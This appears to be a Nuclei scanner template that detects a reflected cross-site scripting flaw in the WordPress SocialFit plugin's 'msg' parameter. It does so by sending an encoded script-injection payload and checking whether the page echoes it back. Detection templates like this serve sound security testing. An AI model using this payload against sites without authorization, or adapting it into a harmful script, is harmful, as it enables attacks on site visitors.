id: wp-socialfit-xss

info:
  name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
  reference:
    - https://www.exploit-db.com/exploits/37481
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'
      - type: word
        part: header
        words:
          - "text/html"
      - type: status
        status:
          - 200
